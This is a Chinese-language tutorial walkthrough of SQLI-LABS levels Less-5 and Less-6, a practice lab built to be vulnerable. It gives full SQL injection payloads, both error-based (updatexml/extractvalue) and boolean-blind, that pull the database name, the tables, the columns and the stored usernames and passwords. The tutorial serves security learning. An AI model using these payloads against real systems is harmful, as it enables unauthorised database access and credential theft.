2. 程式人生 > 其它 >SQLI-LABS(三)

SQLI-LABS(三)

阿新 發佈:2021-02-04

技術標籤:SQLI-LABS

SQLI-LABS(三)

文章目錄


準備的函式: 

left(a,b);     從左側開始擷取a的前b位
length(a);     返回字串a的長度
regexp();
like();
substr(a,b,c); 從b位開始擷取字串a的c位
ascii('a');    返回字母 a 的 ascii值
ord();
chr();
if(a,b,c);     a為true,執行b;a錯誤,執行c

Less-5:

?id=1

在這裡插入圖片描述

?id=2

在這裡插入圖片描述

?id=50

在這裡插入圖片描述

發現只要語句正確,顯示的結果都相同,沒有回顯

?id=1'

在這裡插入圖片描述出現報錯資訊,證明存在sql漏洞

sql語句:SELECT * FROM users WHERE id='1'' LIMIT 0,1
報錯資訊:''1'' LIMIT 0,1',去掉包圍的引號,為'1'' LIMIT 0,1

知為字元型注入,以 '閉合

?id=1' order by 3--+
判斷列數為3

方法一:報錯注入

既然報錯資訊可以在頁面中顯示出來,那麼我們進行報錯注入

XPATH報錯

extratvalue();
?id=1 and extractvalue(
 
1,concat('^',(select version()),'^'))--+
updataxml();
?id=1 and updatexml(1,concat('^',(select version()),'^'),1)--+

查庫:

?id=1' and updatexml(1,concat('~',(select database()),'~'),1)--+

在這裡插入圖片描述
查表:

?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='
 
security'),'~'),1)--+

在這裡插入圖片描述
查欄位:

?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),'~'),1)--+

在這裡插入圖片描述
查欄位內容:

?id=1' and updatexml(1,concat('~',(select group_concat(concat_ws('~',username,password))from security.users),'~'),1)--+

在這裡插入圖片描述

方法二:判斷是否為布林型別注入

?id=1' and 1=1--+

在這裡插入圖片描述

?id=1' and 1=2--+

在這裡插入圖片描述
兩次頁面不同,確定可以使用布林盲注

布林盲注—對可變引數進行爆破處理

查庫:

判斷資料庫的長度:

資料庫長度是否為1?
?id=1' and length(database())=1 --+

具體判斷資料庫的組成:

字母判斷:
判斷資料庫名的第一位是否為a?
?id=1' and left(database(),1)='a'--+

ascii判斷:
判斷資料庫名的第一位ascii值是否大於100?
?id=1 and ascii(substr(database(),1,1)) > 100 --+

經過嘗試之後可以知道

?id=1' and length(database())='8'--+
?id=1' and ascii(substr(database(),1,1))=115--+
?id=1' and database()='security'--+
即資料庫是 security

看哪一個庫名開頭為's'?
?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 7,1),1,1)) =115--+
知第八個資料庫為 security

查表:

看哪一個表名開頭為'u'?
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)) ='117'--+
知第四張表為 users

查欄位:

看哪一個欄位開頭為'u'?
?id=1' and ascii(substr((select column_name from information_schema.columns  where table_name='users' limit 12,1),1,1)) =117--+
知第13個欄位為 username
同樣的方法知道第13個欄位為 password

查欄位內容:

?id=1' and ascii(substr((select username from security.users limit 0,1),1,1)) > 100--+
?id=1' and ascii(substr((select password from security.users limit 0,1),1,1)) > 100--+
用該方法一個一個查出 username,以及password 的資訊

Less-6:

?id=1"

在這裡插入圖片描述出現報錯資訊,證明存在sql漏洞

報錯資訊:'"1"" LIMIT 0,1',去掉包圍的引號,為 "1"" LIMIT 0,1
知為字元型注入,以 "閉合

?id=1" order by 3--+
判斷列數為3

與第五關的區別只有閉合方式不同,將第五個的單引號改為雙引號即可

相關推薦

SQLI-LABS

技術標籤:SQLI-LABS SQLI-LABS 文章目錄 SQLI-LABSLess-5:方法一:報錯注入XPATH報錯

SQLI-LABS

SQLI-LABS 學習前的準備: sql是什麼? sql注入:在web應用程式事先定義好的查詢語句結尾新增額外SQL語句, 欺騙資料庫伺服器執行非授權的任意查詢,得到相應的資料資訊,進行提權等; 2、搭建sqli-la

Sqli-labs1-4

目錄 前言 此關卡的主要思想以及步驟如下: 首先判斷注入方式 less-1 提示為字元型注入,構造payload ../?id=1\' and 1=1正確 ../?id=1\' and 1=2錯誤確認存在注入點

sqli labsLess-1至Less-10

網安興趣愛好者,初次分享學習筆記。 Less-1 型別 字元型回顯注入\' 輸入點 根據新增\'頁面的回顯,可以判斷出\'是閉合

sqli-labs11-20

less-11 本關還可以使用union聯合查詢注入和盲注 1使用burpsuite抓包,修改引數構造payload。

sqli-labs42-45

less-42 開頁面,似曾相識,像極了前邊的二次注入,但是這裡忘記密碼``建立帳號都是沒用的功能,好像就沒法二次注入了,只有嘗試登入了像極了現實生活的注入,先登陸,再注入,登陸後出現了修改密碼的介面

OpenGL學習-- OpenGL 基礎渲染

我的 OpenGL 專題學習目錄,希望和大家一起學習交流進步! OpenGL學習-- 術語瞭解

iOS網路

一、NSURLProtocol網路攔截 NSURLProtocol是抽象類,使用時要使用其子類 // 使用子類需先註冊

Dubbo原始碼解析註冊中心——開篇

註冊中心——開篇 目標:解釋註冊中心在dubbo框架中作用,dubbo-registry-api原始碼解讀

手把手教你用 Node 實現 HTTP 協議

手把手教你用 Node 實現 HTTP 協議 上一章介紹瞭如何解析 HTTP 請求報文,這一章我們來講解如何進行報文的收發和 TCP 連線的建立。

微服務設計學習服務治理之服務註冊與發現

前言 歡迎閱讀往期系列: 微服務設計學習關於微服務和如何建模服務 微服務設計學習關於服務的整合

Node 使用 Egg 框架 之 上TS 的教程

Node + Egg + TS + typegoose + Resetful + schedule + type-graphql+ websocket 樑老師課堂,不間斷,最終版教程來啦。

伯陽的網路筆記:HTTP/2

因為疫情期間在外當志願者,晚上回家無聊翻翻網路知識,權當記錄了。 初始動筆:2019-02-06

帶你入坑大資料 --- MapReduce介紹

前言 在上一篇文章中我們已經瞭解了HDFS的讀寫流程,HA高可用,聯邦和Sequence Files方案,簡單回顧一下HDFS的寫流程吧

Flink 系列—— Flink Data Source

一、內建 Data Source Flink Data Source 用於定義 Flink 程式的資料來源,Flink 官方提供了多種資料獲取方法,用於幫助開發者簡單快速地構建輸入流,具體如下:

Spring Ioc原始碼分析 之 Bean的載入:各個 scope 的 Bean 建立

在Spring中Bean有許多不同的作用域,例如:singleton、prototype、request等等,本篇文章就來分析一下各個scope的Bean是怎麼建立的

Hive 系列—— Hive CLI 和 Beeline 命令列的基本使用

一、Hive CLI 1.1 Help 使用 hive -H 或者 hive --help 命令可以檢視所有命令的幫助,顯示如下:

Docker容器學習之Docker 映象構建

Docker 映象構建一般使用Dockerfile,首先我們需要了解Dockerfile語法Dockerfile官方檔案,然後我們編寫好Dockerfile檔案之後就可以開始構建我們的專案對應Docker映象,如果構建呢?我們可以手動使用docker命

Spring Boot : ORM 框架 JPA 與連線池 Hikari

前面兩篇文章我們介紹瞭如何快速建立一個 Spring Boot 工程《Spring Boot:快速開始》和在 Spring Boot 中如何使用模版引擎 Thymeleaf 渲染一個Web頁面《Spring Boot :模版引擎 Thymeleaf 渲染 Web 頁

Hadoop 系列—— 分散式計算框架 MapReduce

一、MapReduce概述 Hadoop MapReduce 是一個分散式計算框架,用於編寫批處理應用程式。編寫好的程式可以提交到 Hadoop 叢集上用於並行處理大規模的資料集。